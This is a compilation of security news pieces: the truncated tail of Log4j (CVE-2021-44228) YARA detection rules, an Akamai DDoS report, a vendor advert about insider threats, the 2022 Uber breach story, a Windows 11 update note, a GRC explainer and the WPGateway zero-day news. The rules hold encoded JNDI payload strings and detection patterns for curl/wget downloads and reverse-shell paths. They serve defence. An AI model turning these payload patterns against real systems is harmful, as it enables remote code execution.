$sa1 = {22 2E 6C 6F 67 34 6A 2E 63 6F 72 65 2E 6E 65 74 2E 4A 6E 64 69 4D 61 6E 61 67 65 72 2E 6C 6F 6F 6B 75 70 28 4A 6E 64 69 4D 61 6E 61 67 65 72 22}
$sa2 = {22 45 72 72 6F 72 20 6C 6F 6F 6B 69 6E 67 20 75 70 20 4A 4E 44 49 20 72 65 73 6F 75 72 63 65 22}
condition:
$xa1 or all of ($sa*)
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
strings:
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 72 6D 69 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6C 64 61 70 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 64 6E 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 69 69 6F 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 68 74 74 70 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 69 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 6E 64 73 3A 2F 22}
$ = {22 24 7B 6A 6E 64 69 3A 63 6F 72 62 61 3A 2F 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {
strings:
$x1 = {22 24 25 37 42 6A 6E 64 69 3A 22}
$x2 = {22 25 32 35 32 34 25 32 35 37 42 6A 6E 64 69 22}
$x3 = {22 25 32 46 25 32 35 32 35 32 34 25 32 35 32 35 37 42 6A 6E 64 69 25 33 41 22}
$x4 = {22 24 7B 6A 6E 64 69 3A 24 7B 6C 6F 77 65 72 3A 22}
$x5 = {22 24 7B 3A 3A 2D 6A 7D 24 7B 22}
condition:
1 of them
}
rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
strings:
$x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
$fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
condition:
$x1 and not 1 of ($fp*)
}
rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
strings:
/* curl -s */
$sa1 = {22 59 33 56 79 62 43 41 74 63 79 22}
$sa2 = {22 4E 31 63 6D 77 67 4C 58 4D 67 22}
$sa3 = {22 6A 64 58 4A 73 49 43 31 7A 49 22}
/* |wget -q -O- */
$sb1 = {22 66 48 64 6E 5A 58 51 67 4C 58 45 67 4C 55 38 74 49 22}
$sb2 = {22 78 33 5A 32 56 30 49 43 31 78 49 43 31 50 4C 53 22}
$sb3 = {22 38 64 32 64 6C 64 43 41 74 63 53 41 74 54 79 30 67 22}
condition:
1 of ($sa*) and 1 of ($sb*)
}
rule SUSP_JDNIExploit_Indicators_Dec21 {
strings:
$xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis|nds|corba):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
condition:
filesize < 100MB and $xr1
}
rule SUSP_EXPL_OBFUSC_Dec21_1{
strings:
/* ${lower:X} - single character match */
$ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
/* ${upper:X} - single character match */
$ = { 24 7B 75 70 70 65 72 3A ?? 7D }
/* URL encoded lower - obfuscation in URL */
$ = {22 24 25 37 62 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 62 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 62 6A 6E 64 69 3A 22}
$ = {22 24 25 37 42 6C 6F 77 65 72 3A 22}
$ = {22 24 25 37 42 75 70 70 65 72 3A 22}
$ = {22 25 32 34 25 37 42 6A 6E 64 69 3A 22}
condition:
1 of them
}"
AND count > 0 AND path NOT LIKE "/var/log/gc%"

Source :
https://www.akamai.com/blog/security/recommendations-for-log4j-mitigation

Record-Breaking DDoS Attack in Europe

They’re back! 

Or, more accurately, the cybercriminals responsible for July’s record-setting European DDoS attack may have never left. In the weeks following our coverage of the previous incident, the victim (a customer based in Eastern Europe) has been bombarded relentlessly with sophisticated distributed denial-of-service (DDoS) attacks, ultimately paving the way for a new European packets per second (pps) DDoS record.

On Monday, September 12, 2022, Akamai successfully detected and mitigated the now-largest DDoS attack ever launched against a European customer on the Prolexic platform, with attack traffic abruptly spiking to 704.8 Mpps in an aggressive attempt to cripple the organization’s business operations.

Attack breakdown

Adversaries are constantly evolving their techniques, tactics, and procedures to evade detection and maximize disruption, as demonstrated by this ongoing attack campaign. Let’s break down and compare the two record-setting events. 

 July AttackSeptember Attack
Peak pps659.6 Mpps704.8 Mpps
Cumulative Attacks75201
IPs Targeted5121813
VectorUDPUDP
Distribution1 location6 locations
Date of AttackJuly 21, 2022September 12, 2022
Top Scrubbing LocationsHKG, LON, TYOHKG, TYO, LON

Prior to June 2022, this customer only saw attack traffic against its primary data center; however, they recognized the importance of a comprehensive defensive strategy early on, and onboarded their 12 remaining global data centers to the Prolexic platform for peace of mind. This proved highly fortuitous, as the attack campaign expanded unexpectedly, hitting six different global locations, from Europe to North America. These events reflect a growing trend in which adversaries are increasingly hitting deep-reconnaissance targets

Attack mitigation

To thwart an attack of this magnitude and complexity, Akamai leveraged a balanced combination of automated and human mitigation: 99.8% of the assault was pre-mitigated thanks to the customer’s proactive defensive posture, a preemptive security measure implemented by the Akamai Security Operations Command Center (SOCC). Remaining attack traffic and follow-up attacks leveraging different vectors were swiftly mitigated by our frontline security responders. In the wake of increasingly sophisticated DDoS attacks worldwide, many businesses struggle with the staffing of internal security resources, and instead look to Akamai’s SOCC to augment and act as an extension of their incident response team.

The attackers’ command and control system had no delay in activating the multidestination attack, which escalated in 60 seconds from 100 to 1,813 IPs active per minute. Those IPs were spread across eight distinct subnets in six distinct locations. An attack this heavily distributed could drown an underprepared security team in alerts, making it difficult to assess the severity and scope of the intrusion, let alone fight the attack. Sean Lyons, Senior Vice President and General Manager of Infrastructure Security says, “Akamai Prolexic’s DDoS specialization culture, focus on customer infrastructure designs and history are rooted in defending the most complex, multifaceted attacks, and our platform is equipped with purpose-built tooling for rapid threat mitigation, even in the ‘fog of war.’ “

Akamai Prolexic’s DDoS specialization culture, focus on customer infrastructure designs and history are rooted in defending the most complex, multifaceted attacks, and our platform is equipped with purpose-built tooling for rapid threat mitigation, even in the ‘fog of war.

Sean Lyons, Senior Vice President and General Manager of Infrastructure Security
Distinct IP Count Per Minute.

 

Conclusion

Having a proven DDoS mitigation strategy and platform in place is imperative for shielding your business from downtime and disruption. Learn more about Akamai’s industry-leading DDoS solutions and how our advanced attack-fighting capabilities keeps organizations safe from increasingly sophisticated threats. 

Under attack? 

Click here for 24/7 emergency DDoS protection.

Guidance on minimizing DDoS risk

  • Immediately review and implement Cybersecurity and Infrastructure Security Agency (CISA) recommendations. 
  • Review critical subnets and IP spaces, and ensure that they have mitigation controls in place.
  • Deploy DDoS security controls in an always-on mitigation posture as a first layer of defense, to avoid an emergency integration scenario and to reduce the burden on incident responders. If you don’t have a trusted and proven cloud-based provider, get one now. 
  • Proactively pull together a crisis response team and ensure runbooks and incident response plans are up-to-date. For example, do you have a runbook to deal with catastrophic events? Are the contacts within the playbooks updated? A playbook that references outdated tech assets or people who have long left the company isn’t going to help.

For additional information on the steps you can take to protect your organization, please visit the following CISA resources:

5 Ways to Mitigate Your New Insider Threats in the Great Resignation

Companies are in the midst of an employee “turnover tsunami” with no signs of a slowdown. According to Fortune Magazine, 40% of the U.S. is considering quitting their jobs. This trend – coined the great resignation – creates instability in organizations. High employee turnover increases security risks, and companies are more vulnerable to attacks from human factors worldwide.

At Davos 2022, statistics connect the turmoil of the great resignation to the rise of new insider threats. Security teams are feeling the impact. It’s even harder to keep up with your employee security. Companies need a fresh approach to close the gaps and prevent attacks. This article will examine what your security teams must do within the new organizational dynamics to quickly and effectively address unique challenges.

Handling Your New Insider Threats

Implementing a successful security awareness program is more challenging than ever for your security team—the new blood coming in causes cultural dissonance. Every new employee brings their own security habits, behavior, and ways of work. Changing habits is slow. Yet, companies don’t have the luxury of time. They must get ahead of hackers to prevent attacks from new insider threats.

Be sure to handle your organization’s security high-impact risks:

  • Prevent data loss – When employees leave, there’s a high risk of sensitive data leaks. Manage off-boarding and close lurking dormant emails to prevent data loss.
  • Maintain best practices – When new employees join the organization, even if security training is well conducted, they’re not on par with their peers. Unknown security habits may put the organization at risk.
  • Ensure friendly reminders – With less staff, employees are overburdened and pressured. Security may be “forgotten” or neglected in the process.
  • Support remote work –To support rapid employee recruitment, working at home is a must. Remote work flexibility helps to attract and retain new employees.
  • Train on the go – Remote work requires securing remote devices and dealing with new employee behavior for inherent distractions – on the go and at home.

5 Preventive Measures for High Impact in Your Organization

Security teams must protect companies against new phishing attempts within the high workforce flux. Practical security training is key to countering hackers. New techniques and practices are required to support remote work and new behavioral challenges, especially during times of high employee turnover. To succeed, your training must keep cyber awareness fresh for all staff. It must genuinely transform the behavior of your new employees.

Here are five preventive measures to effectively protect your organization for cyber resilience:

Ensure all staff get continuous training

Security risks are constantly evolving and ever-present. All employees are needed to protect against sophisticated phishing threats. It’s even more complicated in the great resignation. With new weak links, your company is at the greatest risk. Gullible employees leave security ‘holes’ in your organization’s front line. Security teams are well aware of the risks.

Research shows that companies must continuously train 100% of their staff every month. Yet, employees spend little time thinking about security.

Automated security awareness training like CybeReady makes it easier to manage security training for all your staff.

  • Instead of manual work, use new, in-depth BI data and reports to guide your training plan for new and experienced employees.
  • Adjust difficulty level to the role, geography, and risk, to flexibly control your diverse employee needs and vulnerabilities.
  • Raise employee awareness of threats.
  • Prevent hacker exploitation and emergency triage with company leadership.

Target new employees

Your security depends on employee help and cooperation. Build best practices on the job. Threat basics aren’t enough to stop malicious actors. Whether in the office or working remotely, security training must foster mastery. Start with low difficulty. Create a foundation. Continually promote learning to the next level. You must understand and cater to your employee’s needs and way of work for effectiveness.

Simply sending out emails to employees is not enough for a robust learning experience. With security awareness platforms like CybeReady, training becomes more scientific for continuous, accurate analysis of your security awareness.

  • Adjust your training simulations to employee contexts and frequency for mastery.
  • Set difficulty level depending on employee behavior and results.
  • Use intensive, bite-size intervals for success.
  • By varying attack scenarios, new employees get proper onboarding.
  • Put security on the top of the mind of all your staff.

Prioritize your highest risk groups

For a cyber awareness training program to be successful, security teams must plan, operate, evaluate and adapt accordingly. Forecasting actual difficulty and targeting groups can be complex. Security teams must determine future attack campaigns based on employee behavior and address challenges in a given scenario.

With data-driven platforms like CybeReady, your security teams monitor campaign performance to fine-tune employee defense.

  • Build custom high-intensity training campaigns for your high-risk groups.
  • Focus on specific challenges for concrete results like:

1) Password and data requests

2) Messages from seemingly legitimate senders and sources

3) Realistic content tailored to a specific department or role.

  • Adapt your training for both individuals and attack vectors while respecting employee privacy.
  • Shift problematic group behavior to best practices.

Keep busy staff vigilant

Security is 24/7. Keep your training unpredictable to maintain employee vigilance. Send surprising simulation campaigns in a continuous cycle. Catch employees off guard for the best learning. To create high engagement, ensure your training content is relevant to daily actions. Use short, frequent, and intriguing content in their own language. Tailor to local references and current news.

With scientific, data-based simulations like CybeReady, companies mimic the rapidly changing attack environment – plus, tick all your compliance boxes for a complete solution. Stay abreast of evolving global phishing trends as they vary around the world. Focus all your employees on the attacker styles and scenarios most popular in their geographies and languages. Adjust frequency to personal and group risk.

Ensure long-term results for every employee

Take advantage of the ‘golden moment.’ Just-in-time learning is the key to the most effective results. Instead of random enforcement training often irrelevant to employees, make a lasting impression right when mistakes happen. Ensure that your training uses this limited window of time. People are likelier to remember the experience and change behavior the next time.

With data science-driven cyber security training platforms like CybeReady, security teams seize the moment of failure for long-term results. With just-in-time learning, employees immediately get training on mistakes made upon falling for a simulation. They retain critical knowledge and respond better in future attack scenarios. With a new awareness of risks, transform learning into new behaviors.

Cutting Your Security Risks with a New Level of Employee Awareness

In global organizations today, seamlessly integrating the latest security know-how into everyday work is a must to counter the new risks of the great resignation. It’s more important than ever for every employee to get up to speed for high cyber resilience quickly.

Download the CybeReady Playbook to learn how CybeReady’s fully automated security awareness training platform provides the fast, concrete results you need with virtually zero effort IT, or schedule a product demo with one of our experts.

Source :
https://thehackernews.com/2022/09/5-ways-to-mitigate-your-new-insider.html

Uber Says It’s Investigating a Potential Breach of Its Computer Systems

Ride hailing giant Uber disclosed Thursday it’s responding to a cybersecurity incident involving a breach of its network and that it’s in touch with law enforcement authorities.

The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter.

CyberSecurity

The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach.

The publication said the malicious intruder compromised an employee’s Slack account, and leveraged it to broadcast a message that the company had “suffered a data breach,” in addition to listing internal databases that’s supposed to have been compromised.

“It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees,” the New York Times said.

Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be an 18-year-old teenager, social-engineered the employee to get hold of their password by masquerading as a corporate IT person and used it to obtain a foothold into the internal network.

Although the account was secured with two-factor authentication (2FA) protections, the hacker is alleged to have spammed the employee with push notifications and also contacted the person on WhatsApp, asking to accept the request by claiming to be from Uber’s IT department.

The incident is reminiscent of the recently disclosed Cisco hack wherein the cybercriminal actors resorted to the technique of prompt bombing to achieve a 2FA push acceptance.

“Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface,” Kevin Reed, chief information security officer at Acronis, told The Hacker News.

https://platform.twitter.com/embed/Tweet.html?creatorScreenName=TheHackersNews&dnt=true&embedId=twitter-widget-0&features=eyJ0ZndfdGltZWxpbmVfbGlzdCI6eyJidWNrZXQiOlsibGlua3RyLmVlIiwidHIuZWUiLCJ0ZXJyYS5jb20uYnIiLCJ3d3cubGlua3RyLmVlIiwid3d3LnRyLmVlIiwid3d3LnRlcnJhLmNvbS5iciJdLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2hvcml6b25fdGltZWxpbmVfMTIwMzQiOnsiYnVja2V0IjoidHJlYXRtZW50IiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9lZGl0X2JhY2tlbmQiOnsiYnVja2V0Ijoib24iLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X3JlZnNyY19zZXNzaW9uIjp7ImJ1Y2tldCI6Im9uIiwidmVyc2lvbiI6bnVsbH0sInRmd19jaGluX3BpbGxzXzE0NzQxIjp7ImJ1Y2tldCI6ImNvbG9yX2ljb25zIiwidmVyc2lvbiI6bnVsbH0sInRmd190d2VldF9yZXN1bHRfbWlncmF0aW9uXzEzOTc5Ijp7ImJ1Y2tldCI6InR3ZWV0X3Jlc3VsdCIsInZlcnNpb24iOm51bGx9LCJ0Zndfc2Vuc2l0aXZlX21lZGlhX2ludGVyc3RpdGlhbF8xMzk2MyI6eyJidWNrZXQiOiJpbnRlcnN0aXRpYWwiLCJ2ZXJzaW9uIjpudWxsfSwidGZ3X2V4cGVyaW1lbnRzX2Nvb2tpZV9leHBpcmF0aW9uIjp7ImJ1Y2tldCI6MTIwOTYwMCwidmVyc2lvbiI6bnVsbH0sInRmd19kdXBsaWNhdGVfc2NyaWJlc190b19zZXR0aW5ncyI6eyJidWNrZXQiOiJvbiIsInZlcnNpb24iOm51bGx9LCJ0ZndfdHdlZXRfZWRpdF9mcm9udGVuZCI6eyJidWNrZXQiOiJvZmYiLCJ2ZXJzaW9uIjpudWxsfX0%3D&frame=false&hideCard=false&hideThread=true&id=1570597582417821703&lang=en&origin=https%3A%2F%2Fthehackernews.com%2F2022%2F09%2Fuber-says-its-investigating-potential.html&sessionId=14c833fd33dd721084b56fe86117b79e60e7b2d1&siteScreenName=TheHackersNews&theme=light&widgetsVersion=1bfeb5c3714e8%3A1661975971032&width=550px

This is not Uber’s first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and ultimately paying off the hackers $100,000 to hide the breach. It became public knowledge only in late 2017.

Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had “instructed his team to keep knowledge of the 2016 breach tightly controlled.” Sullivan has contested the accusations.

CyberSecurity

In December 2021, Sullivan was handed down additional three counts of wire fraud to previously filed felony obstruction and misprision charges. “Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack,” the superseding indictment said.

It further said he “took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach.”

The latest breach also comes as the criminal case against Sullivan went to trial in the U.S. District Court in San Francisco.

“The compromise is certainly bigger compared to the breach in 2016,” Reed said. “Whatever data Uber keeps, the hackers most probably already have access.”

Source :
https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html

Windows 11 KB5017328 update fixes USB printing, audio headset issues

Microsoft has released the Windows 11 KB5017328 cumulative update with security updates and improvements, including USB printing and Bluetooth headsets fixes.

KB5017328 is a mandatory cumulative update containing the September 2022 Patch Tuesday security updates for vulnerabilities discovered in previous months.

Windows 11 KB5017328 cumulative update
Windows 11 KB5017328 cumulative update

Windows 11 users can install today’s update by going to Start Settings > Windows Update and clicking on ‘Check for Updates.’

Windows 11 users can also manually download and install the KB5017328 preview update from the Microsoft Update Catalog.

What’s new in the Windows 11 KB5017328 update

After installing today’s non-security update, Windows 11 will have its build number changed to 22000.978.

The Windows 11 KB5017328 cumulative update includes approximately 25 improvements and fixes, with the highlighted fixes listed below:

  • USB printers that might have malfunctioned when you restarted your device or reinstalled them now work as expected.
  • Microsoft fixed a Windows 11 SE that displayed trust errors when attempting to install apps from the Microsoft Store.
  • Microsoft fixed an issue where Bluetooth audio headsets stopped playing audio after adjusting the progress bar.
  • Microsoft addressed a Microsoft Edge IE mode issue that prevented users from interacting with dialog boxes.
  • Fixed a bug that prevented Windows from displaying Microsoft account (MSA) login forms after installing the  KB5016691 update.

In addition to these issues, Microsoft also fixed eighteen other bugs, as explained in the August KB5016691 preview update.

Related Articles:

Windows 11 KB5016691 preview update released with 22 changes

Windows 11 KB5016629 update fixes Start Menu, File Explorer issues

Windows 11 KB5015882 update fixes bugs causing File Explorer to freeze

Microsoft September 2022 Patch Tuesday fixes zero-day used in attacks, 63 flaws

Windows 10 KB5017308 and KB5017315 updates released

Source:
https://www.bleepingcomputer.com/news/microsoft/windows-11-kb5017328-update-fixes-usb-printing-audio-headset-issues/

How GRC protects the value of organizations — A simple guide to data quality and integrity

Contemporary organizations understand the importance of data and its impact on improving interactions with customers, offering quality products or services, and building loyalty.

Data is fundamental to business success. It allows companies to make the right decisions at the right time and deliver the high-quality, personalized products and services that customers expect.

There is a challenge, though.

Businesses are collecting more data than ever before, and new technologies have accelerated this process dramatically. As a result, organizations have significant volumes of data, making it hard to manage, protect, and get value from it.

Here is where Governance, Risk, and Compliance (GRC) comes in. GRC enables companies to define and implement the best practices, procedures, and governance to ensure the data is clean, safe, and reliable across the board.

More importantly, organizations can use GRC platforms like StandardFusion to create an organizational culture around security. The objective is to encourage everyone to understand how their actions affect the business’s success.

Now, the big question is:

Are organizations getting value from their data?

To answer that, first, it’s important to understand the following two concepts.

Data quality

Data quality represents how reliable the information serves an organization’s specific needs — mainly supporting decision-making.

Some of these needs might be:

  • Operations – Where and how can we be more efficient?
  • Resource distribution – Do we have any excess? Where? And why?
  • Planning – How likely is this scenario to occur? What can we do about it?
  • Management – What methods are working? What processes need improvement?

From a GRC standpoint, companies can achieve data quality by creating rules and policies so the entire organization can use that data in the same ways. These policies could, for example, define how to label, transfer, process, and maintain information.

Data Integrity

Data integrity focuses on the trustworthiness of the information in terms of its physical and logical validity. Some of the key characteristics to ensure the usability of data are:

  • Consistency
  • Accuracy
  • Validity
  • Truthfulness

GRC’s goal for data integrity is to keep the information reliable by eliminating unwanted changes between updates or modifications. It is all about the data’s accuracy, availability, and trust.

How GRC empowers organizations achieve high-quality data

Organizations that want to leverage their data to generate value must ensure the information they collect is helpful and truthful. The following are the key characteristics of high-quality data:

  • Completeness: The expected data to make decisions is present.
  • Uniqueness: There is no duplication of data.
  • Timeliness: The data is up-to-date and available to use when needed.
  • Validity: The information has the proper format and matches the requirements.
  • Accuracy: The data describes the object correctly in a real-world context.
  • Consistency: The data must be the same across multiple databases

A powerful way to make sure the company’s data maintains these six characteristics is by leveraging the power of GRC.

Why?

Because GRC empowers organizations to set standards, regulations, and security controls to avoid mistakes, standardize tasks and guide personnel when collecting and dealing with vital information.

GRC helps organizations answer the following questions:

  • How is the company ensuring that data is available for internal decision and for the clients?
  • Is everyone taking the proper steps to collect and process data?
  • Have redundancies been removed?
  • Is the organization prepared for unexpected events?
  • Does the organization have a backup system?
  • Are the key processes standardized?

Overall, GRC aims to build shared attitudes and actions towards security.

Why every organization needs high-quality data and how GRC helps

Unless the data companies collect is high-quality and trustworthy, there’s no value in it — it becomes a liability and a risk for the organization.

Modern companies recognize data as an essential asset that impacts their bottom line. Furthermore, they understand that poor data quality can damage credibility, reduce sales, and minimize growth.

In today’s world, organizations are aiming to be data-driven. However, becoming a data-driven organization is tough without a GRC program.

How so?

Governance, Risk, and Compliance enable organizations to protect and manage data quality by creating standardized, controlled, and repeatable processes. This is key because every piece of data an organization process has an associated risk.

By understanding these risks, companies can implement the necessary controls and policies for handling and extracting data correctly so that every department can access the same quality information.

Organizations without structured data can’t provide any value, and they face the following risks:

  • Missed opportunities: Many leads are lost because of incomplete or inaccurate data. Also, incorrect data means wrong insights, resulting in missing critical business opportunities.
  • Lost revenue: According to 2021 Gartner’s research, the average financial impact of poor data quality on organizations is $12.9 million annually.
  • Poor customer experience: When data quality is poor, organizations can’t identify customers’ pain points and preferences. As a result, the offer of products or services doesn’t match customers’ needs and expectations.
  • Lack of compliance: In some industries where regulations control relationships or customer transactions, maintaining good-quality data can be the difference between compliance and fines of millions of dollars. GRC is vital to keep compliance in the loop as new regulations evolve worldwide.
  • Increased expenses: A few years ago, IBM’s research showed that businesses lost 3.1 trillion dollars in the US alone. How? Spending time to find the correct data, fixing errors, and just hunting for information and confirmed sources.
  • Misanalysis: Around 84% of CEOs are concerned about the quality of data they are deciding on. Wrong data will lead to bad decisions and ultimately damage operations, finances, HR, and every area within the company.
  • Reputational damage: In today’s world, customers spend a lot of their time reading reviews before making a decision. For instance, if a company fails to satisfy its customers, everyone will know.
  • Reduced efficiency: Poor data quality forces employees to do manual data quality checks, losing time and money.

To sum up:

Having the right processes to manipulate data will prevent organizations from missing business opportunities, damaging their reputation, and doing unnecessary repetitive tasks.

How GRC supports data-driven business and what are the key benefits of clean data

Data-driven businesses embrace the use of data (and its analysis) to get insights that can improve the organization. The efficient management of big data through GRC tools helps identify new business opportunities, strengthen customer experiences, grow sales, improve operations, and more.

For example, GRC helps data-driven businesses by allowing them to create and manage the right policies to process and protect the company’s data.

More importantly, organizations can also control individual policies to ensure they have been distributed and acknowledged accordingly.

In terms of benefits, although clean data has numerous “easy-to-identify” benefits, many others are not easily identified. Trusting data not just improves efficiency and results; it also helps with fundamental, vital factors that affect business performance and success.

What are these factors?

Fundamental benefits:

  • Profits/Revenue
  • Internal communication
  • Employees confidence to share information
  • Company’s reputation
  • Trust

Operational benefits:

  • Efficiency
  • Business outcome
  • Privacy issues
  • Customer satisfaction
  • Better audience-targeting

How GRC protect the value of businesses and their data

In this contemporary world, companies should be measured not only via existing financial measurements but also by the amount of monetizable data they can capture, consume, store and use. More importantly, how the data helps the organization’s internal processes to be faster and more agile.

When people think of high-quality data and big data, they usually associate these two with big organizations, especially technology and social media platforms. However, big quality data gives organizations of any size plenty of benefits.

Data quality and integrity help organizations to:

  • Understand their clients
  • Enhance business operations
  • Understand industry best practices
  • Identify the best partnership options
  • Strengthen business culture
  • Deliver better results
  • Make more money

Using the right GRC platform helps companies create and control the policies and practices to ensure their data is valid, consistent, accurate, and complete — allowing them to get all these benefits.

The key to using GRC tools is that businesses can produce what customers expect on a greater scale and with higher precision and velocity.

Now, what does this have to do with value?

By protecting the value of data, organizations are protecting their overall worth. Indeed, GRC empowers companies to create a culture of value, giving everyone education and agency so they can make better decisions.

Also, GRC helps companies tell better security stories. These stories aim to build trust with customers and partners, enter new markets, and shorten sale cycles.

To summarize:

A better understanding of customers and processes — through data — will lead to better products and services, enhanced experiences, and long-lasting relationships with customers. All these represent growth and more revenue for companies.

What happens when a company’s data is not safe? Can it damage their value?

Trust is a vital component of any interaction (business or personal) and, as such, is mandatory for organizations to protect it — without trust, there is no business.

When data is not protected, the chances of breaches are higher, causing direct and indirect costs.

Direct costs are:

  • Fines
  • Lawsuits
  • Stolen information
  • Compensations
  • Potential business loss

Indirect costs are:

  • Reputation/Trust
  • PR activities
  • Lost revenue from downtime
  • New and better protection

Often, reputation damages can cause long-term harm to organizations, making it hard for them to acquire and maintain business. In fact, reputation loss is the company’s biggest worry, followed by financial costs, system damage, and downtime.

So, what does all this mean?

It’s not just about collecting data; it is also about how companies reduce risks and leverage and protect the data they have. GRC integrates data security, helping organizations be better prepared against unauthorized access, corruption, or theft.

Moreover, GRC tools can help elevate data security by controlling policies, regulations, and predictable issues within the organization.

The bottom line?

When companies can’t get or maintain customers because of a lack of trust, the organization’s value will be significantly lower — or even zero. Unfortunately, this is even more true for small and medium size companies.

How to use GRC to achieve and maintain high-quality data?

Many organizations have trouble managing their data, which, unfortunately, leads to poor decisions and a lack of trust from employees and customers.

Moreover, although companies know how costly wrong information is, many are not working on ensuring quality data through the right processes and controls. In fact, Harward Business Review said that 47% of newly created data records have at least one critical error.

Why is that?

Because there is a lack of focus on the right processes and systems that need to be in place to ensure quality data.

What do poor processes cause?

  • Human errors
  • Wrong data handling
  • Inaccurate formatting
  • Different sets of data for various departments
  • Unawareness of risks
  • Incorrect data input or extraction

Fortunately, GRC’s primary goal is to develop the right policies and procedures to ensure everyone in the organization appropriately manages the data.

GRC aims to create a data structure based on the proper governance that will dictate how people organize and handle the company’s information. As a result, GRC will empower companies to be able to extract value from their data.

That is not everything.

Governance, Risk, and Compliance allow organizations to understand the risks associated with data handling and guide managers to create and distribute the policies that will support any data-related activity.

The following are some of the ways GRC is used to achieve and maintain high-quality data:

  • Data governance: Data governance is more than setting rules and telling people what to do. Instead, it is a collection of processes, roles, policies, standards, and metrics that will lead to a cultural change to ensure effective management of information throughout the organization.
  • Education: Achieving good data quality is not easy. It requires a deep understanding of data quality principles, processes, and technologies. GRC facilitates the education process by allowing the organization to seamlessly implement, share, and communicate its policies and standards to every department.
  • Everyone is involved: Everyone must understand the organization’s goal for data quality and the different processes and approaches that will be implemented. GRC focuses on cultural change.
  • Be aware of threats: When managing data, each process has risks associated with it. The mission of GRC is for the organization to recognize and deal with potential threats effectively. When companies are aware of risks, they can implement the necessary controls and rules to protect the data.
  • One single source of truth: A single source of truth ensures everyone in the organization makes decisions based on the same consistent and accurate data. GRC can help by defining the governance over data usage and manipulation. Furthermore, GRC makes it easy to communicate policies, see who the policy creator is, and ensure employees are acting according to the standards.

Get a free consultation with StandardFusion to learn more about how GRC and data governance can boost your organization’s value.

Source :
https://thehackernews.com/2022/09/how-grc-protects-value-of-organizations.html

Over 280,000 WordPress Sites Attacked Using WPGateway Plugin Zero-Day Vulnerability

A zero-day flaw in the latest version of a WordPress premium plugin known as WPGateway is being actively exploited in the wild, potentially allowing malicious actors to completely take over affected sites.

Tracked as CVE-2022-3180 (CVSS score: 9.8), the issue is being weaponized to add a malicious administrator user to sites running the WPGateway plugin, WordPress security company Wordfence noted.

“Part of the plugin functionality exposes a vulnerability that allows unauthenticated attackers to insert a malicious administrator,” Wordfence researcher Ram Gall said in an advisory.

CyberSecurity

WPGateway is billed as a means for site administrators to install, backup, and clone WordPress plugins and themes from a unified dashboard.

The most common indicator that a website running the plugin has been compromised is the presence of an administrator with the username “rangex.”

Additionally, the appearance of requests to “//wp-content/plugins/wpgateway/wpgateway-webservice-new.php?wp_new_credentials=1” in the access logs is a sign that the WordPress site has been targeted using the flaw, although it doesn’t necessarily imply a successful breach.

Wordfence said it blocked over 4.6 million attacks attempting to take advantage of the vulnerability against more than 280,000 sites in the past 30 days.

Further details about the vulnerability have been withheld owing to active exploitation and to prevent other actors from taking advantage of the shortcoming. In the absence of a patch, users are recommended to remove the plugin from their WordPress installations until a fix is available.

CyberSecurity

The development comes days after Wordfence warned of in-the-wild abuse of another zero-day flaw in a WordPress plugin called BackupBuddy.

The disclosure also arrives as Sansec revealed that threat actors broke into the extension license system of FishPig, a vendor of popular Magento-WordPress integrations, to inject malicious code that’s designed to install a remote access trojan called Rekoobe.

Source :
https://thehackernews.com/2022/09/over-280000-wordpress-sites-attacked.html